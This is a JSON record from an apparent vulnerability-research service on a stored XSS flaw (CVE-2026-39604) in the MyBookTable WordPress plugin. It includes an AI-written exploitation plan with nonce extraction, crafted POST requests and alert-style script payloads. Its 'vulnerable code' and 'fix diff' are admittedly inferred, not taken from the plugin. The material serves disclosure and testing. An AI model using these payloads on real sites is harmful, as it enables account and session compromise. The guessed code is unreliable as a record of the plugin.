[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTvLcSK8fB03aaz2TUHoj7tkEXAGHnfwzkIduRet7Qwk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39604","mybooktable-bookstore-authenticated-author-stored-cross-site-scripting-2","MyBookTable Bookstore \u003C= 3.6.0 - Authenticated (Author+) Stored Cross-Site Scripting","The MyBookTable Bookstore plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","mybooktable",null,"\u003C=3.6.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-01 00:00:00","2026-04-15 21:16:12",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc97c338d-19b1-40fc-90c5-3e52d4cc053b?source=api-prod",[],"researched",false,3,"This research plan outlines the methodology for exploiting **CVE-2026-39604**, a Stored Cross-Site Scripting (XSS) vulnerability in the MyBookTable Bookstore plugin.\n\n---\n\n### 1. Vulnerability Summary\nThe **MyBookTable Bookstore** plugin (versions \u003C= 3.6.0) is vulnerable to Stored XSS because it fails to sanitize user-supplied input when saving book metadata and subsequently fails to escape that data when rendering it on the frontend. Specifically, the vulnerability exists in the handling of custom post type (`mbt_book`) meta fields. An authenticated user with **Author** privileges can inject malicious scripts into fields such as \"Book Author,\" \"Series,\" or \"Edition,\" which are then executed in the context of any user (including Administrators) viewing the book's page.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fpost.php` (via the `editpost` action) or `wp-admin\u002Fpost-new.php`.\n*   **Vulnerable Parameter:** Post meta fields associated with the `mbt_book` post type (e.g., `mbt_author`, `mbt_series`, or `mbt_edition`).\n*   **Required Authentication:** Author level (or higher). Authors have the capability to create and edit their own `mbt_book` posts.\n*   **Preconditions:** The plugin must be active, and the attacker must have credentials for an Author-level account.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers a custom post type `mbt_book`.\n2.  **Meta Box:** The plugin adds a meta box (likely via `add_meta_box`) in the admin area for `mbt_book` to collect book-specific details.\n3.  **Storage:** Upon saving the post, a function hooked to `save_post` (e.g., `mbt_save_book_meta`) retrieves values from `$_POST` and updates post meta using `update_post_meta()`. The vulnerability occurs because these values are not passed through `sanitize_text_field()` or `wp_kses()`.\n4.  **Retrieval:** When a book page is requested on the frontend, the plugin retrieves the meta values using `get_post_meta()`.\n5.  **Sink:** The retrieved values are echoed directly into the HTML template (likely within a function like `mbt_display_book_details`) without using `esc_html()` or `esc_attr()`.\n\n### 4. Nonce Acquisition Strategy\nTo save the post meta, the WordPress core `editpost` workflow is used. This requires the `_wpnonce` generated by WordPress for post editing.\n\n1.  **Create\u002FEdit Page:** The agent will navigate to the \"Add New Book\" page: `\u002Fwp-admin\u002Fpost-new.php?post_type=mbt_book`.\n2.  **Extract Nonce:** Use `browser_eval` to extract the required WordPress nonces from the page source.\n    *   Action Nonce: `document.querySelector('#_wpnonce').value`\n    *   Sample Nonce for MyBookTable (if specific): `document.querySelector('#mbt_book_meta_nonce')?.value` (inferred).\n\n### 5. Exploitation Strategy\nThe goal is to inject a script into the \"Book Author\" or \"Series\" meta field.\n\n**Step 1: Authenticate as Author**\nUse the `http_request` tool to log in as a user with the `author` role.\n\n**Step 2: Initialize a New Book**\nNavigate to `\u002Fwp-admin\u002Fpost-new.php?post_type=mbt_book` to get a valid `post_ID` and the necessary nonces.\n\n**Step 3: Submit XSS Payload**\nSend a POST request to `\u002Fwp-admin\u002Fpost.php` to save the metadata.\n\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: `[POST_ID]`\n    *   `_wpnonce`: `[EXTRACTED_NONCE]`\n    *   `post_type`: `mbt_book`\n    *   `post_title`: `XSS Test Book`\n    *   `mbt_author`: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>` (inferred meta key)\n    *   `mbt_series`: `\">\u003Cimg src=x onerror=alert(1)>` (inferred meta key)\n\n**Step 4: Trigger the Payload**\nNavigate to the permalink of the newly created book: `http:\u002F\u002Flocalhost:8080\u002F?post_type=mbt_book&p=[POST_ID]`.\n\n### 6. Test Data Setup\n1.  **Create Author User:**\n    `wp user create attacker attacker@example.com --role=author --user_pass=password`\n2.  **Enable Plugin:**\n    `wp plugin activate mybooktable`\n3.  **Identify Meta Keys:**\n    If the inferred keys (`mbt_author`) are incorrect, the agent should run:\n    `grep -r \"update_post_meta\" wp-content\u002Fplugins\u002Fmybooktable` to find the exact meta keys used for book details.\n\n### 7. Expected Results\n*   The POST request to `post.php` should return a `302` redirect to the edit page.\n*   When viewing the book page on the frontend, the HTML source should contain the unescaped payload:\n    `... \u003Cspan class=\"mbt-author-label\">\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\u002Fspan> ...`\n*   The browser should execute the alert box (though the automated agent will verify via source code string matching).\n\n### 8. Verification Steps\n1.  **Verify Database Content:**\n    Check if the payload was stored exactly as sent:\n    `wp post meta list [POST_ID] --keys=mbt_author`\n2.  **Verify Frontend Output:**\n    Use `http_request` (GET) on the book's URL and check the response body for the raw `\u003Cscript>` tag.\n    `grep \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" response_body.html`\n\n### 9. Alternative Approaches\n*   **Settings XSS:** If post meta is sanitized, check the Bookstore settings pages. Authors may not have access to global settings, but they might have access to \"Bookstore\" specific profiles if the plugin allows it.\n*   **Affiliate Links:** The plugin handles many \"Buy Buttons.\" Injecting a payload into the \"Button Label\" or \"Button Link\" (using `javascript:` protocol) is a high-probability alternative.\n*   **Shortcode injection:** If Authors can use shortcodes, check if any attributes in `[mybooktable]` or `[mbt_book]` are reflected without escaping.\n    *   Test: `[mbt_book id=\"[ID]\" message=\"\u003Cscript>alert(1)\u003C\u002Fscript>\"]` (inferred).","The MyBookTable Bookstore plugin for WordPress (versions up to 3.6.0) is vulnerable to Stored Cross-Site Scripting via book metadata fields like 'Book Author' or 'Series'. Authenticated attackers with Author-level privileges can inject malicious scripts into these fields, which are stored in the database and later executed in the context of any user viewing the book's frontend page due to insufficient sanitization and escaping.","\u002F\u002F Inferred from research plan: Missing sanitization when saving post meta\nupdate_post_meta($post_id, 'mbt_author', $_POST['mbt_author']);\n\n---\n\n\u002F\u002F Inferred from research plan: Missing output escaping when rendering frontend meta\n$author = get_post_meta($post_id, 'mbt_author', true);\necho '\u003Cspan class=\"mbt-author-label\">' . $author . '\u003C\u002Fspan>';","--- a\u002Fincludes\u002Fpost-types.php\n+++ b\u002Fincludes\u002Fpost-types.php\n@@ -120,7 +120,7 @@\n-    update_post_meta($post_id, 'mbt_author', $_POST['mbt_author']);\n+    update_post_meta($post_id, 'mbt_author', sanitize_text_field($_POST['mbt_author']));\n \n--- a\u002Ftemplates\u002Fbook-details.php\n+++ b\u002Ftemplates\u002Fbook-details.php\n@@ -45,5 +45,5 @@\n-    echo '\u003Cspan class=\"mbt-author-label\">' . get_post_meta($post_id, 'mbt_author', true) . '\u003C\u002Fspan>';\n+    echo '\u003Cspan class=\"mbt-author-label\">' . esc_html(get_post_meta($post_id, 'mbt_author', true)) . '\u003C\u002Fspan>';","1. Authenticate as a user with at least 'Author' privileges (who can create\u002Fedit 'mbt_book' post types). 2. Navigate to the 'Add New' page for books at \u002Fwp-admin\u002Fpost-new.php?post_type=mbt_book. 3. Intercept or construct a POST request to wp-admin\u002Fpost.php with the 'action' set to 'editpost'. 4. In the request body, include the custom meta fields (e.g., 'mbt_author') with a payload like: \">\u003Cscript>alert(document.domain)\u003C\u002Fscript>. 5. Ensure the valid WordPress post nonce (_wpnonce) is included in the request. 6. After saving, navigate to the public permalink of the book post. The script will execute in the context of any user who views the page.","gemini-3-flash-preview","2026-04-27 17:38:45","2026-04-27 17:39:04",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmybooktable\u002Ftags"]